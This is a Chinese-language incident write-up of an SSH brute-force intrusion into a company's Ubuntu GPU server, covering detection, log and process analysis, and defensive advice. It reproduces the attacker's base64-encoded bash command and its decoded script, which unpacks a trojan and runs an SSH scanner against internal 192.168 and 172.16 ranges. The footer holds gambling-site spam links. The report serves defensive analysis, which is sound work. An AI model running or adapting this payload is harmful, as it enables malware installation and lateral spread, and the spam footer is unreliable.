皇派平台

关于大数据计算Dell服务器被入侵的安全案例

事件背景

2019-04-04 17:47邮件消息收到告警,公司机房的一台用于大数据分析的Dell T630服务器发现SSH的多次短时并发登录请求告警,在流分系统查询登录的IP地址多为国外IP,同时触发了1个严重级别的安全事件告警,该攻击地址为法国IP,且与ssh登录记录保持一致。

image.png image.png

image.pngimage.png


在威胁情报中心查询这个IP,显示有DDOS攻击和SSH攻击


15882325877837.png

二、服务器基本情况

服务器为公司内部的一台GPU服务器,服务器操作系统 Ubuntu 18.04.3 LTS,平时只做测试用,对外开启了SSH端口,做了一些基本的安全设置,比如禁止root用户远程登录,普通用户登陆通知等。但由于服务器属于多人使用,创建的非root用户,可能存在用户弱密码。

公司基本网络拓扑情况

wps1.png

三 、被入侵后可能造成的威胁

1.在上面运行挖矿程序,消耗CPU、GPU、内存和网络带宽

2.被当作肉鸡去攻击外网的服务器

3.被当作肉鸡入侵内网的其他服务器和主机,造成一系列的横向威胁

4.系统遭受破坏,服务器数据丢失


四、事件分析

 收到告警通知后,立即登录到服务器查看情况,发现服务器CPU内存网络带宽暂时都是正常的,没有出现高利用率,但是发现服务器历史登录记录,历史命令和/var/log/messages都被清空了,显然黑客具备一定的反侦查意识。

image.png

使用lastb命令查看登陆失败的操作,发现有很多国外IP在尝试登录这台机器的ssh,应该是在暴力破解服务器密码。

image.png

由于告警通知上面登录用户是zb, 因此zb用户的密码应该是被破解,而且黑客成功使用zb用户登陆进入了我们的服务器。我们查看zb用户运行的进程,发现了异常进程,这里黑客是通过base64编码传递shell命令(应该是为了逃避规则引擎的检测)
image.png
bash -c sleep 15s && cd /var/tmp; echo "IyEvYmluL2Jhc2gKY2QgL3RtcAkKcm0gLXJmIC5zc2gKcm0gLXJmIC5tb3VudGZzCnJtIC1yZiAuWDEzLXVuaXgKcm0gLXJmIC5YMTctdW5peApybSAtcmYgLlgxOS11bml4CnJtIC1yZiAuWDIqCm1rZGlyIC5YMjUtdW5peApjZCAuWDI1LXVuaXgKbXYgL3Zhci90bXAvZG90YTMudGFyLmd6IGRvdGEzLnRhci5negp0YXIgeGYgZG90YTMudGFyLmd6CnNsZWVwIDNzICYmIGNkIC90bXAvLlgyNS11bml4Ly5yc3luYy9jCm5vaHVwIC90bXAvLlgyNS11bml4Ly5yc3luYy9jL3RzbSAtdCAxNTAgLVMgNiAtcyA2IC1wIDIyIC1QIDAgLWYgMCAtayAxIC1sIDEgLWkgMCAvdG1wL3VwLnR4dCAxOTIuMTY4ID4+IC9kZXYvbnVsbCAyPjEmCnNsZWVwIDhtICYmIG5vaHVwIC90bXAvLlgyNS11bml4Ly5yc3luYy9jL3RzbSAtdCAxNTAgLVMgNiAtcyA2IC1wIDIyIC1QIDAgLWYgMCAtayAxIC1sIDEgLWkgMCAvdG1wL3VwLnR4dCAxNzIuMTYgPj4gL2Rldi9udWxsIDI+MSYKc2xlZXAgMjBtICYmIGNkIC4uOyAvdG1wLy5YMjUtdW5peC8ucnN5bmMvaW5pdGFsbCAyPjEmCmV4aXQgMA==" | base64 --decode | bash

通过base64解码得到机器运行的是一些shell命令

#!/bin/bash

cd /tmp

rm -rf .ssh

rm -rf .mountfs

rm -rf .X13-unix

rm -rf .X17-unix

rm -rf .X19-unix

rm -rf .X2*

mkdir .X25-unix

cd .X25-unix

mv /var/tmp/dota3.tar.gz dota3.tar.gz

tar xf dota3.tar.gz

sleep 3s && cd /tmp/.X25-unix/.rsync/c

nohup /tmp/.X25-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&

sleep 8m && nohup /tmp/.X25-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&

sleep 20m && cd ..; /tmp/.X25-unix/.rsync/initall 2>1&

exit 0


image.png

可以看到,黑客在机器上解压了一个包,运行了一些程序,在/tmp下面也能找到留下的程序,但是有可能是由于下载不完全,压缩包损坏了,只解压出来一部分的程序,install的命令运行失败了导致最终木马程序是没有执行起来的。这个时候已经发现了服务器被入侵,我们及时进行了处理,黑客程序还没有起来的情况下,这台主机的外网连接被我们切断了,停掉了所有异常的进程。
image.png

同时,我们通过人工排查发现,在服务器的zb用户的家目录 /home/zb/.ssh/authorized_keys这个文件里面被添加了公钥,留了后门,这种情况下,以后黑客就可以实现免密码登录我们的服务器。这个文件的修改时间刚好是入侵的时间。

因为这台机器只有一个SSH的端口映射在公网上,所以黑客应该是从SSH登录进系统然后下载并运行了程序,怀疑是因为zb这个用户的密码比较弱,被黑客字典破解了。

image.png

至于木马文件是怎么下载到机器上面来的,初步判断应该是通过scp,因为scp是加密的,如果用wget curl之类的有可能会被防病毒设备检测到,通过后面的会话记录查看192.168.4.144这台机器和外部的连接也只有ssh协议。

把服务器上黑客留下的程序用杀毒软件扫描,杀毒软件报木马程序。image.png


五、溯源查看

1.会话记录查看

查看这台机器的外联IP情况,发现有很多国外的IP在连接这台机器的SSH端口 

image.png
这一条就是当时黑客登录系统的SSH连接,因为payload大小有3M多,可推测在传输后台木马的文件到入侵了的服务器。 1586328063055.png


通过流量分析系统的流记录可以看出这一段时间内与192.168.4.144通信的都是外部的IP,而且都是ssh的应用,没有其他的应用,说明黑客是直接通过SSH入侵的这一台服务器,不是内部其他服务器入侵,也不是通过其他的应用。


2.对服务器进行漏洞扫描

扫描发现该服务器对局域网开放了三个端口,两个SSH的端口,一个SMTP的端口,但是对外网只开放了一个SSH的端口。

发现了一个25端口的中危漏洞,并未发现SSH服务的漏洞,黑客应该不是利用这个漏洞入侵的。那就只能是通过SSH暴力破解进入的服务器。

wps5.jpg

六、此类攻击的防御方式

  1. 服务器禁止用户设置弱密码,设置复杂用户密码策略,及时清理不使用的用户,和用户组(可以指定密码策略)。

  2. 禁止root用户登录,普通用户如有需要使用sudo执行。

  3. 通过第三方防护应用来防止ssh暴力破解(denyhosts,fail2ban可以实现连续输错密码几次就把IP列到黑名单,一段时间后自动移出黑名单)。

  4. 使用密钥登录,修改服务的默认端口,使用不常用端口。

  5. 定期加固系统,实时更新系统版本和运行的软件版本。


皇派平台 官网

地 址:长沙市岳麓区潇湘南路368号中盈广场D栋406-407

邮政编码:410200

电 话:+86-0731-89578690

邮 箱:szxwkj@stpetersburgball.com

招聘邮箱:szxwkj@stpetersburgball.com

久发体育手机版官网_WWW.JIUFA365.COM 五大联赛下注_WWW.JY431.COM 乐鱼体育_WWW.LEYU.COM 好彩客_WWW.1055.COM BOB综合APP_WWW.BOB68.APP 永乐国际_WWW.PK1117.COM 最大体育平台_WWW.HTH.COM BG视讯_WWW.2811.COM